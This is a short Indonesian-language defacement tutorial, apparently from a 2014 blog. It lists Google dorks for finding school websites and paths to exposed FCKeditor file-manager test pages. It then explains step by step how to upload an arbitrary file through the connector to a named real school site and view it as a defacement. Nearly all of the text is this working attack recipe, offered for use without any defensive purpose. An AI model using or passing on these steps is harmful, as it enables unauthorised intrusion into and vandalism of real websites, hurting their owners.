Langsung aje dah..
Dorknya:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Exploit :
http://www.public_html.com/dir/editor/filemanager/connectors/uploadtest.html
http://www.public_html.com/dir/editor/filemanager/connectors/test.html
http://www.public_html.com/dir/editor/filemanager/browser/default/browser.html
pilih salah satu aja ...
klo udah milih target masukin exploitnya
Contoh :
http://smpn4pakem.sch.id/editor/filemanager/connectors/uploadtest.html
lalu pilih connector nya dari ASP --> PHP,, lalu pilih file yg mw kamu upload,, klik "Sent It To Server"
lalu Copy text yg ada di "Uploaded File URL" paste di belakang website yg kamu deface
Contoh :
http://smpn4pakem.sch.id/userfiles/robot.txt
Keep Enjoy ^_^
Sabtu, 16 Agustus 2014